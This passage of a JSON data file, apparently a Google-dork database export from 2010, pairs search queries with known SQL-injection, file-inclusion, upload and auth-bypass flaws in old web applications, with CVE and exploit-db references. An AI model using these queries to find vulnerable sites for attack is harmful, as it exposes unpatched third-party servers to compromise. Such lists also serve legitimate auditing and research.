(who_r.php bj) Remote File Inclusion Vulnerability - CVE: 2007-2086: http://www.exploit-db.com/exploits/3741", "submited": "2010-11-15", "request": "\"CNStats 2.9\"", "id": 1785}, {"short description": "\"Browse with Interactive Map\"", "long description": "PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability - CVE: 2007-6462: http://www.exploit-db.com/exploits/4737", "submited": "2010-11-15", "request": "\"Browse with Interactive Map\"", "id": 1786}, {"short description": ": use Your brain (:", "long description": "http://www.exploit-db.com/exploits/5871", "submited": "2010-11-15", "request": "", "id": 1787}, {"short description": "intext:\"Powered By Azaronline.com\"", "long description": "Azaronline Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15391", "submited": "2010-11-15", "request": "intext:\"Powered By Azaronline.com\"", "id": 1789}, {"short description": "Powered by ephpscripts", "long description": "E-Shop Shopping Cart Script (search_results.php) SQL Injection Vuln - CVE: 2008-5838: http://www.exploit-db.com/exploits/6398", "submited": "2010-11-15", "request": "Powered by ephpscripts", "id": 1790}, {"short description": "\"powered by Blog System\"", "long description": "Blog System 1.x (note) SQL Injection Vuln - CVE: 2010-0458: http://www.exploit-db.com/exploits/11216", "submited": "2010-11-15", "request": "\"powered by Blog System\"", "id": 1791}, {"short description": "\"Powered by DWdirectory\"", "long description": "DWdirectory 2.1 Remote SQL Injection Vulnerability - CVE: 2007-6392: http://www.exploit-db.com/exploits/4708", "submited": "2010-11-15", "request": "\"Powered by DWdirectory\"", "id": 1792}, {"short description": "\"2005 www.frank-karau.de\" | \"2006 www.frank-karau.de\"", "long description": "GL-SH Deaf Forum 6.4.4 Local File Inclusion Vulnerabilities - CVE: 2007-3535: http://www.exploit-db.com/exploits/4124", "submited": "2010-11-15", "request": "\"2005 www.frank-karau.de\" | \"2006 
www.frank-karau.de\"", "id": 1793}, {"short description": "inurl:jgs_treffen.php", "long description": "Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability - CVE: 2008-1640: http://www.exploit-db.com/exploits/5329", "submited": "2010-11-15", "request": "inurl:jgs_treffen.php", "id": 1796}, {"short description": "\"Powered by SoftbizScripts\" inurl:\"searchresult.php?sbcat_id=\"", "long description": "Softbiz Recipes Portal Script Remote SQL Injection Vulnerability - CVE: 2007-5449: http://www.exploit-db.com/exploits/4527", "submited": "2010-11-15", "request": "\"Powered by SoftbizScripts\" inurl:\"searchresult.php?sbcat_id=\"", "id": 1797}, {"short description": "Powered by SNETWORKS PHP CLASSIFIEDS", "long description": "SNETWORKS PHP CLASSIFIEDS 5.0 Remote File Inclusion Vulnerability - CVE: 2008-0137: http://www.exploit-db.com/exploits/4838", "submited": "2010-11-15", "request": "Powered by SNETWORKS PHP CLASSIFIEDS", "id": 1798}, {"short description": "inurl:Editor/assetmanager/assetmanager.asp", "long description": "Asset Manager Remote File upload Vulnerability: http://www.exploit-db.com/exploits/12693", "submited": "2010-11-15", "request": "inurl:Editor/assetmanager/assetmanager.asp", "id": 1799}, {"short description": "inurl:makaledetay.asp?id=", "long description": "Mayasan Portal v2.0 (makaledetay.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14420", "submited": "2010-11-15", "request": "inurl:makaledetay.asp?id=", "id": 1800}, {"short description": "inurl:\"ir/addlink.php?id=\" OR inurl:\"addlink.php?id=\"", "long description": "list Web (addlink.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10838", "submited": "2010-11-15", "request": "inurl:\"ir/addlink.php?id=\" OR inurl:\"addlink.php?id=\"", "id": 1802}, {"short description": "inurl: Powered by Traidnt UP Version 1.0.", "long description": "Traidnt UP Version 1.0 Remote File Upload Vulnerability: 
http://www.exploit-db.com/exploits/8006", "submited": "2010-11-15", "request": "inurl: Powered by Traidnt UP Version 1.0.", "id": 1803}, {"short description": "inurl:\"com_linkr\"", "long description": "Joomla Component com_linkr - Local File Inclusion: http://www.exploit-db.com/exploits/11756", "submited": "2010-11-15", "request": "inurl:\"com_linkr\"", "id": 1806}, {"short description": "inurl:\"com_janews\"", "long description": "Joomla Component com_janews - Local File Inclusion - CVE: 2010-1219: http://www.exploit-db.com/exploits/11757", "submited": "2010-11-15", "request": "inurl:\"com_janews\"", "id": 1807}, {"short description": "inurl:\"com_sectionex\"", "long description": "Joomla Component com_sectionex - Local File Inclusion: http://www.exploit-db.com/exploits/11759", "submited": "2010-11-15", "request": "inurl:\"com_sectionex\"", "id": 1808}, {"short description": "inurl:\"com_rokdownloads\"", "long description": "Joomla Component com_rokdownloads - Local File Inclusion - CVE: 2010-1056: http://www.exploit-db.com/exploits/11760", "submited": "2010-11-15", "request": "inurl:\"com_rokdownloads\"", "id": 1809}, {"short description": "inurl:\"com_ganalytics\"", "long description": "Joomla Component com_ganalytics - Local File Inclusion: http://www.exploit-db.com/exploits/11758", "submited": "2010-11-15", "request": "inurl:\"com_ganalytics\"", "id": 1810}, {"short description": "inurl:/phpfootball/", "long description": "PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability - CVE: 2007-0638: http://www.exploit-db.com/exploits/3226", "submited": "2010-11-15", "request": "inurl:/phpfootball/", "id": 1811}, {"short description": "\"Search Adult Directory:\"", "long description": "Adult Directory (cat_id) Remote SQL Injection Vulnerability - CVE: 2007-4056: http://www.exploit-db.com/exploits/4238", "submited": "2010-11-15", "request": "\"Search Adult Directory:\"", "id": 1812}, {"short description": "inurl:forum_answer.php?que_id", "long 
description": "AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14986", "submited": "2010-11-15", "request": "inurl:forum_answer.php?que_id", "id": 1813}, {"short description": "allinurl:index.php?act=publ", "long description": "Qwerty CMS (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8104", "submited": "2010-11-15", "request": "allinurl:index.php?act=publ", "id": 1814}, {"short description": "inurl:\"com_cartweberp\"", "long description": "Joomla Component com_cartweberp LFI Vulnerability - CVE: 2010-0982: http://www.exploit-db.com/exploits/10942", "submited": "2010-11-15", "request": "inurl:\"com_cartweberp\"", "id": 1815}, {"short description": "\"PHPAuction GPL Enhanced V2.51 by AuctionCode.com\"", "long description": "Auction_Software Script Admin Login Bypass vulnerability: http://www.exploit-db.com/exploits/14247", "submited": "2010-11-15", "request": "\"PHPAuction GPL Enhanced V2.51 by AuctionCode.com\"", "id": 1816}, {"short description": "inurl:com_doqment", "long description": "Joomla Component com_doqment (cid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10965", "submited": "2010-11-15", "request": "inurl:com_doqment", "id": 1817}, {"short description": "intext:PHPhotoalbum v0.5", "long description": "PHPhotoalbum 0.5 Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2501: http://www.exploit-db.com/exploits/5683", "submited": "2010-11-15", "request": "intext:PHPhotoalbum v0.5", "id": 1818}, {"short description": "\"Powered by OnePound\"", "long description": "onepound shop 1.x products.php SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9138", "submited": "2010-11-15", "request": "\"Powered by OnePound\"", "id": 1819}, {"short description": "\"Powered By : Yamamah Version 1.00\"", "long description": "Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability - CVE: 2010-2334: 
http://www.exploit-db.com/exploits/13856", "submited": "2010-11-15", "request": "\"Powered By : Yamamah Version 1.00\"", "id": 1823}, {"short description": "\"powered by SnoGrafx\"", "long description": "SnoGrafx (cat.php?cat) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14523", "submited": "2010-11-15", "request": "\"powered by SnoGrafx\"", "id": 1825}, {"short description": "allinurl:\"xGb.php\"", "long description": "xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability - CVE: 2007-4637: http://www.exploit-db.com/exploits/4336", "submited": "2010-11-15", "request": "allinurl:\"xGb.php\"", "id": 1826}, {"short description": "\"Powered by ForumApp\"", "long description": "ForumApp 3.3 Remote Database Disclosure Vulnerability - CVE: 2008-6147: http://www.exploit-db.com/exploits/7599", "submited": "2010-11-15", "request": "\"Powered by ForumApp\"", "id": 1827}, {"short description": "inurl:/component/jeeventcalendar/", "long description": "Joomla JE Event Calendar LFI Vulnerability: http://www.exploit-db.com/exploits/14062", "submited": "2010-11-15", "request": "inurl:/component/jeeventcalendar/", "id": 1828}, {"short description": "allinurl: page_id album \"photo\"", "long description": "Wordpress Photo album Remote SQL Injection Vulnerability - CVE: 2008-0939: http://www.exploit-db.com/exploits/5135", "submited": "2010-11-15", "request": "allinurl: page_id album \"photo\"", "id": 1829}, {"short description": "\"Powered by beamospetition 1.0.12\"", "long description": "Joomla Component beamospetition 1.0.12 SQL Injection / XSS - CVE: 2009-0378: http://www.exploit-db.com/exploits/7847", "submited": "2010-11-15", "request": "\"Powered by beamospetition 1.0.12\"", "id": 1830}, {"short description": "\"Powered by 68kb\"", "long description": "68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection: http://www.exploit-db.com/exploits/11925", "submited": "2010-11-15", "request": "\"Powered by 68kb\"", "id": 1831}, {"short description": 
"intext:\"powered and designed by Dow Group\"", "long description": "Dow Group (new.php) SQL Injection: http://www.exploit-db.com/exploits/9491", "submited": "2010-11-15", "request": "intext:\"powered and designed by Dow Group\"", "id": 1832}, {"short description": "\"powered by devalcms v1.4.a\"", "long description": "devalcms 1.4a XSS / Remote Code Execution - CVE: 2008-6982: http://www.exploit-db.com/exploits/6369", "submited": "2010-11-15", "request": "\"powered by devalcms v1.4.a\"", "id": 1833}, {"short description": "inurl:com_webring", "long description": "Joomla Webring Component 1.0 Remote Include Vulnerability - CVE: 2006-4129: http://www.exploit-db.com/exploits/2177", "submited": "2010-11-15", "request": "inurl:com_webring", "id": 1834}, {"short description": "inurl:hikaye.asp?id=", "long description": "Caner Hikaye Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14419", "submited": "2010-11-15", "request": "inurl:hikaye.asp?id=", "id": 1835}, {"short description": "intext:Design by: runt communications", "long description": "runt-communications Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12707", "submited": "2010-11-15", "request": "intext:Design by: runt communications", "id": 1837}, {"short description": "Copyright Agares Media phpautovideo", "long description": "phpAutoVideo CSRF Vulnerability - OSVDB-ID: 62450: http://www.exploit-db.com/exploits/11502", "submited": "2010-11-15", "request": "Copyright Agares Media phpautovideo", "id": 1838}, {"short description": "\"Powered by DVHome.cn\"", "long description": "PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion Vulnerability - CVE: 2007-2544: http://www.exploit-db.com/exploits/3854", "submited": "2010-11-15", "request": "\"Powered by DVHome.cn\"", "id": 1840}, {"short description": "intext:\"powered by Milonic\" inurl:viewnews.php?id=", "long description": "Milonic News (viewnews) SQL Injection Vulnerability: 
http://www.exploit-db.com/exploits/11031", "submited": "2010-11-15", "request": "intext:\"powered by Milonic\" inurl:viewnews.php?id=", "id": 1842}, {"short description": "\"powered by ExtCalendar v2\"", "long description": "com_extcalendar Mambo Component 2.0 Include Vulnerability: http://www.exploit-db.com/exploits/2022", "submited": "2010-11-15", "request": "\"powered by ExtCalendar v2\"", "id": 1843}, {"short description": "\"Search | Invite | Mail | Blog | Forum\"", "long description": "Myspace Clone Script (index.php) Remote File Inclusion Vulnerability - CVE: 2007-6057: http://www.exploit-db.com/exploits/4628", "submited": "2010-11-15", "request": "\"Search | Invite | Mail | Blog | Forum\"", "id": 1845}, {"short description": "\"AcmlmBoard v1.A2\"", "long description": "AcmlmBoard 1.A2 (pow) Remote SQL Injection Vulnerability - CVE: 2008-5198: http://www.exploit-db.com/exploits/5969", "submited": "2010-11-15", "request": "\"AcmlmBoard v1.A2\"", "id": 1846}, {"short description": "inurl:index.php?option=com_mambads", "long description": "Mambo Component com_mambads SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11719", "submited": "2010-11-15", "request": "inurl:index.php?option=com_mambads", "id": 1847}, {"short description": "inurl:\"modules.php?name=My_eGallery\"", "long description": "PHP-Nuke My_eGallery 2.7.9 Remote SQL Injection Vulnerability - CVE: 2008-7038: http://www.exploit-db.com/exploits/5203", "submited": "2010-11-15", "request": "inurl:\"modules.php?name=My_eGallery\"", "id": 1848}, {"short description": "\"Marketplace Version 1.1.1\"", "long description": "Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability - CVE: 2008-0689: http://www.exploit-db.com/exploits/5055", "submited": "2010-11-15", "request": "\"Marketplace Version 1.1.1\"", "id": 1850}, {"short description": "\"Powered by Ajax Portal 3.0\"", "long description": "MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5653: 
http://www.exploit-db.com/exploits/7044", "submited": "2010-11-15", "request": "\"Powered by Ajax Portal 3.0\"", "id": 1852}, {"short description": "\"Powered By IP.Board 3.0.0 Beta 5\"", "long description": "Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulns: http://www.exploit-db.com/exploits/8538", "submited": "2010-11-15", "request": "\"Powered By IP.Board 3.0.0 Beta 5\"", "id": 1853}, {"short description": "\"MunzurSoft Wep Portal W3\"", "long description": "MunzurSoft Wep Portal W3 (kat) SQL Injection Vulnerability - CVE: 2008-4573: http://www.exploit-db.com/exploits/6725", "submited": "2010-11-15", "request": "\"MunzurSoft Wep Portal W3\"", "id": 1854}, {"short description": "Powered by Blox CMS from TownNews.com", "long description": "Blox CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12729", "submited": "2010-11-15", "request": "Powered by Blox CMS from TownNews.com", "id": 1855}, {"short description": "allinurl :\"wp-content/plugins/st_newsletter\"", "long description": "Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability - CVE: 2008-0683: http://www.exploit-db.com/exploits/5053", "submited": "2010-11-15", "request": "allinurl :\"wp-content/plugins/st_newsletter\"", "id": 1856}, {"short description": "\"2008 DevWorx - devworx.somee.com\"", "long description": "TermiSBloG V 1.0 SQL Injection(s) Vulnerability: http://www.exploit-db.com/exploits/11081", "submited": "2010-11-15", "request": "\" 2008 DevWorx - devworx.somee.com\"", "id": 1857}, {"short description": "inurl:\"links_showcat.php?\"", "long description": "Dlili Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11318", "submited": "2010-11-15", "request": "inurl:\"links_showcat.php?\"", "id": 1858}, {"short description": "Powered by SH-News 3.0", "long description": "SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability - CVE: 2007-6391: http://www.exploit-db.com/exploits/4709", "submited": "2010-11-15", "request": 
"Powered by SH-News 3.0", "id": 1859}, {"short description": "\"CaLogic Calendars V1.2.2\"", "long description": "CaLogic Calendars 1.2.2 (langsel) Remote SQL Injection Vulnerability - CVE: 2008-2444: http://www.exploit-db.com/exploits/5607", "submited": "2010-11-15", "request": "\"CaLogic Calendars V1.2.2\"", "id": 1860}, {"short description": "inurl:\"com_pollxt\"", "long description": "pollxt Mambo Component 1.22.07 Remote Include Vulnerability - CVE: 2006-5045: http://www.exploit-db.com/exploits/2029", "submited": "2010-11-15", "request": "inurl:\"com_pollxt\"", "id": 1861}, {"short description": "Powered by PHP Links from DeltaScripts", "long description": "PHP Links 1.3 (vote.php id) Remote SQL Injection Vulnerability - CVE: 2008-0565: http://www.exploit-db.com/exploits/5021", "submited": "2010-11-15", "request": "Powered by PHP Links from DeltaScripts", "id": 1862}, {"short description": "inurl:index.php?option=com_calendario", "long description": "Joomla Component com_calendario Blind SQL injection Vulnerability: http://www.exploit-db.com/exploits/10760", "submited": "2010-11-15", "request": "inurl:index.php?option=com_calendario", "id": 1864}, {"short description": "Powered by PNphpBB2 / Powered por PNphpBB2", "long description": "PNphpBB2 1.2g (phpbb_root_path) Remote File Include Vulnerability - CVE: 2006-4968: http://www.exploit-db.com/exploits/2390", "submited": "2010-11-15", "request": "Powered by PNphpBB2 / Powered por PNphpBB2", "id": 1865}, {"short description": "\"Powered by Nukedit\"", "long description": "Nukedit 4.9.8 Remote Database Disclosure Vulnerability - CVE: 2008-5773: http://www.exploit-db.com/exploits/7491", "submited": "2010-11-15", "request": "\"Powered by Nukedit\"", "id": 1866}, {"short description": "Powered by \"vcart 3.3.2\"", "long description": "vcart 3.3.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0287: http://www.exploit-db.com/exploits/4889", "submited": "2010-11-15", "request": "Powered by \"vcart 
3.3.2\"", "id": 1867}, {"short description": "Powered by SkaLinks", "long description": "SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-0451: http://www.exploit-db.com/exploits/7932", "submited": "2010-11-15", "request": "Powered by SkaLinks", "id": 1868}, {"short description": "\"mirco blogging\"", "long description": "x10 mirco blogging V121 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12042", "submited": "2010-11-15", "request": "\"mirco blogging\"", "id": 1869}, {"short description": "\" par KDPics v1.18\"", "long description": "par KDPics v1.18 Remote Add Admin: http://www.exploit-db.com/exploits/11455", "submited": "2010-11-15", "request": "\" par KDPics v1.18\"", "id": 1871}, {"short description": "inurl:\"nabopoll/\"", "long description": "nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability - CVE: 2005-2157: http://www.exploit-db.com/exploits/3315", "submited": "2010-11-15", "request": "inurl:\"nabopoll/\"", "id": 1873}, {"short description": "allinurl :\"modules/eblog\"", "long description": "eXV2 Module eblog 1.2 (blog_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5253", "submited": "2010-11-15", "request": "allinurl :\"modules/eblog\"", "id": 1874}, {"short description": "Powered By DataLife Engine", "long description": "DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability - CVE: 2009-3055: http://www.exploit-db.com/exploits/9572", "submited": "2010-11-15", "request": "Powered By DataLife Engine", "id": 1875}, {"short description": "\" Sabdrimer CMS\"", "long description": "Sabdrimer PRO 2.2.4 (pluginpath) Remote File Include Vulnerability - CVE: 2006-3520: http://www.exploit-db.com/exploits/1996", "submited": "2010-11-15", "request": "\" Sabdrimer CMS\"", "id": 1876}, {"short description": "AlstraSoft Web \"ESE\"", "long description": "AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln - CVE: 2008-5751: 
http://www.exploit-db.com/exploits/7596", "submited": "2010-11-15", "request": "AlstraSoft Web \"ESE\"", "id": 1877}, {"short description": "Powered by Maian Cart v1.1", "long description": "Maian Cart 1.1 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6047", "submited": "2010-11-15", "request": "Powered by Maian Cart v1.1", "id": 1881}, {"short description": "Thyme 1. 2006 eXtrovert Software LLC. All rights reserved", "long description": "Thyme 1.3 (export_to) Local File Inclusion Vulnerability - CVE: 2009-0535: http://www.exploit-db.com/exploits/8029", "submited": "2010-11-15", "request": "Thyme 1. 2006 eXtrovert Software LLC. All rights reserved", "id": 1883}, {"short description": "eXV2 MyAnnonces", "long description": "eXV2 Module MyAnnonces (lid) Remote SQL Injection Vulnerability - CVE: 2008-1406: http://www.exploit-db.com/exploits/5252", "submited": "2010-11-15", "request": "eXV2 MyAnnonces", "id": 1884}, {"short description": "\"BlogMe PHP created by Gamma Scripts\"", "long description": "BlogMe PHP (comments.php id) SQL Injection Vulnerability - CVE: 2008-2175: http://www.exploit-db.com/exploits/5533", "submited": "2010-11-15", "request": "\"BlogMe PHP created by Gamma Scripts\"", "id": 1886}, {"short description": "inurl:\"/go/_files/?file=\"", "long description": "SOTEeSKLEP 3.5RC9 (file) Remote File Disclosure Vulnerability - CVE: 2007-4369: http://www.exploit-db.com/exploits/4282", "submited": "2010-11-15", "request": "inurl:\"/go/_files/?file=\"", "id": 1887}, {"short description": "inurl:\"option=com_camelcitydb2\"", "long description": "Joomla CamelcityDB 2.2 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14530", "submited": "2010-11-15", "request": "inurl:\"option=com_camelcitydb2\"", "id": 1888}, {"short description": "Powered by PacerCMS", "long description": "PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/5098", "submited": 
"2010-11-15", "request": "Powered by PacerCMS", "id": 1889}, {"short description": "inurl:com_expshop", "long description": "Joomla Component EXP Shop (catid) SQL Injection Vulnerability - CVE: 2008-2892: http://www.exploit-db.com/exploits/5893", "submited": "2010-11-15", "request": "inurl:com_expshop", "id": 1890}, {"short description": "\"Sitedesign by: Dieleman www.dieleman.nl - Copyright 2010\"", "long description": "Rave Creations/UHM (artists.asp) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12701", "submited": "2010-11-15", "request": "\"Sitedesign by: Dieleman www.dieleman.nl - Copyright 2010\"", "id": 1891}, {"short description": "intitle:\"ITech Bids\"", "long description": "ITechBids 5.0 (bidhistory.php item_id) Remote SQL Injection Vulnerability - CVE: 2008-0692: http://www.exploit-db.com/exploits/5056", "submited": "2010-11-15", "request": "intitle:\"ITech Bids\"", "id": 1892}, {"short description": "\"Script realise par BinGo PHP\"", "long description": "BinGo News 3.01 (bnrep) Remote File Include Vulnerability - CVE: 2006-4648: http://www.exploit-db.com/exploits/2312", "submited": "2010-11-15", "request": "\"Script realise par BinGo PHP\"", "id": 1893}, {"short description": "Powered by CS-Cart - Shopping Cart Software", "long description": "CS-Cart 1.3.3 (classes_dir) Remote File Include Vulnerability - CVE: 2006-2863: http://www.exploit-db.com/exploits/1872", "submited": "2010-11-15", "request": "Powered by CS-Cart - Shopping Cart Software", "id": 1894}, {"short description": "inurl:com_colophon", "long description": "Mambo Colophon Component 1.2 Remote Inclusion Vulnerability - CVE: 2006-3969: http://www.exploit-db.com/exploits/2085", "submited": "2010-11-15", "request": "inurl:com_colophon", "id": 1895}, {"short description": "\" Powered by JTL-Shop 2\"", "long description": "JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability - CVE: 2010-0691: http://www.exploit-db.com/exploits/11445", "submited": "2010-11-15", 
"request": "\" Powered by JTL-Shop 2\"", "id": 1896}, {"short description": "\"Powered by PHP Shop from DeltaScripts\"", "long description": "DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5648: http://www.exploit-db.com/exploits/7025", "submited": "2010-11-15", "request": "\"Powered by PHP Shop from DeltaScripts\"", "id": 1898}, {"short description": "\"Powered by sNews \" inurl:index.php?id=", "long description": "sNews (index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14458", "submited": "2010-11-15", "request": "\"Powered by sNews \" inurl:index.php?id=", "id": 1901}, {"short description": "\"Torbstoff News 4\"", "long description": "Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability - CVE: 2006-4045: http://www.exploit-db.com/exploits/2121", "submited": "2010-11-15", "request": "\"Torbstoff News 4\"", "id": 1903}, {"short description": "intext:Powered by MX-System 2.7.3", "long description": "MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability - CVE: 2008-2477: http://www.exploit-db.com/exploits/5659", "submited": "2010-11-15", "request": "intext:Powered by MX-System 2.7.3", "id": 1904}, {"short description": "\"Powered By 4smart\"", "long description": "Magician Blog 1.0 (Auth Bypass) SQL injection Vulnerability: http://www.exploit-db.com/exploits/9283", "submited": "2010-11-15", "request": "\"Powered By 4smart\"", "id": 1905}, {"short description": "intext:\"Powered by Arcade Builder\"", "long description": "ArcadeBuilder Game Portal Manager 1.7 Remote SQL Injection Vuln - CVE: 2007-3521: http://www.exploit-db.com/exploits/4133", "submited": "2010-11-15", "request": "intext:\"Powered by Arcade Builder\"", "id": 1906}, {"short description": "\"intext:Warning: passthru()\" \"inurl:view=help\"", "long description": "PTC Site's RCE/XSS Vulnerability: http://www.exploit-db.com/exploits/12808", "submited": "2010-11-15", "request": "\"intext:Warning: passthru()\" 
\"inurl:view=help\"", "id": 1907}, {"short description": "inurl:\"index.php?id_menu=\"", "long description": "CMScontrol 7.x File Upload: http://www.exploit-db.com/exploits/11104", "submited": "2010-11-15", "request": "inurl:\"index.php?id_menu=\"", "id": 1908}, {"short description": "Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine", "long description": "Coppermine Photo Gallery 1.2.2b (Nuke Addon) Include Vulnerability: http://www.exploit-db.com/exploits/2375", "submited": "2010-11-15", "request": "Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine", "id": 1909}, {"short description": "2005-2006 Powered by eSyndiCat Directory Software", "long description": "eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities - CVE: 2007-3811: http://www.exploit-db.com/exploits/4183", "submited": "2010-11-15", "request": "2005-2006 Powered by eSyndiCat Directory Software", "id": 1911}, {"short description": "\"powered by Nabernet\"", "long description": "Nabernet (articles.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11482", "submited": "2010-11-15", "request": "\"powered by Nabernet\"", "id": 1912}, {"short description": "\"Powered by VS PANEL 7.5.5\"", "long description": "http://www.exploit-db.com/exploits/9171 - CVE: 2009-3595: http://www.exploit-db.com/exploits/9171", "submited": "2010-11-15", "request": "\"Powered by VS PANEL 7.5.5\"", "id": 1913}, {"short description": "PHPGnalogie fonctionne sur un serveur PHP", "long description": "PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability - CVE: 2009-3541: http://www.exploit-db.com/exploits/9155", "submited": "2010-11-15", "request": "PHPGnalogie fonctionne sur un serveur PHP", "id": 1914}, {"short description": "\"powered by easytrade\"", "long description": "easyTrade 2.x (detail.php id) Remote SQL Injection Vulnerability - CVE: 2008-2790: http://www.exploit-db.com/exploits/5840", "submited": "2010-11-15", "request": "\"powered by easytrade\"", "id": 
1915}, {"short description": "inurl:\"articles.php?topic=\"", "long description": "jPORTAL 2.3.1 articles.php Remote SQL Injection Vulnerability - CVE: 2007-5973: http://www.exploit-db.com/exploits/4614", "submited": "2010-11-15", "request": "inurl:\"articles.php?topic=\"", "id": 1916}, {"short description": "inurl:\"classifieds.php?op=detail_adverts\"", "long description": "PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability - CVE: 2008-5197: http://www.exploit-db.com/exploits/5961", "submited": "2010-11-15", "request": "inurl:\"classifieds.php?op=detail_adverts\"", "id": 1917}, {"short description": "\"Emefa Guestbook V 3.0\"", "long description": "Emefa Guestbook 3.0 Remote Database Disclosure Vulnerability - CVE: 2008-5852: http://www.exploit-db.com/exploits/7534", "submited": "2010-11-15", "request": "\"Emefa Guestbook V 3.0\"", "id": 1919}, {"short description": "powered by webit! cms", "long description": "Webit Cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12744", "submited": "2010-11-15", "request": "powered by webit! 
cms", "id": 1920}, {"short description": "inurl:\"char.php?id=\" OR intitle:Minimanager for trinity server", "long description": "http://www.exploit-db.com/exploits/12554: http://www.exploit-db.com/exploits/12554", "submited": "2010-11-15", "request": "inurl:\"char.php?id=\" OR intitle:Minimanager for trinity server", "id": 1921}, {"short description": "\"wow roster version 1.*\"", "long description": "WoW Roster 1.70 (/lib/phpbb.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2109", "submited": "2010-11-15", "request": "\"wow roster version 1.*\"", "id": 1922}, {"short description": "inurl:com_DTRegister eventId", "long description": "Joomla Component DT Register Remote SQL injection Vulnerability - CVE: 2008-3265: http://www.exploit-db.com/exploits/6086", "submited": "2010-11-15", "request": "inurl:com_DTRegister eventId", "id": 1924}, {"short description": "\"wow roster version 1.5.*\"", "long description": "WoW Roster 1.5.1 (subdir) Remote File Include Vulnerability - CVE: 2006-3998: http://www.exploit-db.com/exploits/2099", "submited": "2010-11-15", "request": "\"wow roster version 1.5.*\"", "id": 1925}, {"short description": "Powered by free simple software", "long description": "Free Simple Software v1.0 Remote File Inclusion Vulnerability - CVE: 2010-3307: http://www.exploit-db.com/exploits/14672", "submited": "2010-11-15", "request": "Powered by free simple software", "id": 1926}, {"short description": "\"TR Newsportal\" brought by TRanx.", "long description": "TR Newsportal 0.36tr1 (poll.php) Remote File Inclusion Vulnerability - CVE: 2006-2557: http://www.exploit-db.com/exploits/1789", "submited": "2010-11-15", "request": "\"TR Newsportal\" brought by TRanx.", "id": 1927}, {"short description": "Powered by Minerva 237", "long description": "Minerva 2.0.8a Build 237 (phpbb_root_path) File Include Vulnerability - CVE: 2006-3028: http://www.exploit-db.com/exploits/1908", "submited": "2010-11-15", "request": "Powered by Minerva 
237", "id": 1928}, {"short description": "\"Powered By W3infotech\"", "long description": "W3infotech ( Auth Bypass ) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10222", "submited": "2010-11-15", "request": "\"Powered By W3infotech\"", "id": 1930}, {"short description": "inurl:\"option=com_org\"", "long description": "Joomla Component com_org SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11725", "submited": "2010-11-15", "request": "inurl:\"option=com_org\"", "id": 1931}, {"short description": "\"Powered by GameSiteScript\"", "long description": "GameSiteScript 3.1 (profile id) Remote SQL Injection Vulnerability - CVE: 2007-3631: http://www.exploit-db.com/exploits/4159", "submited": "2010-11-15", "request": "\"Powered by GameSiteScript\"", "id": 1932}, {"short description": "Powered by: Con-Imedia", "long description": "IMEDIA (index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12665", "submited": "2010-11-15", "request": "Powered by: Con-Imedia", "id": 1933}, {"short description": "(c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1", "long description": "Bux.to Clone Script Insecure Cookie Handling Vulnerability - CVE: 2008-6162: http://www.exploit-db.com/exploits/6652", "submited": "2010-11-15", "request": "(c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1", "id": 1934}, {"short description": "\"powered by twg\"", "long description": "TinyWebGallery 1.5 (image) Remote Include Vulnerabilities - CVE: 2006-4166: http://www.exploit-db.com/exploits/2158", "submited": "2010-11-15", "request": "\"powered by twg\"", "id": 1935}, {"short description": "allinurl:/phpress/", "long description": "phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/4382", "submited": "2010-11-15", "request": 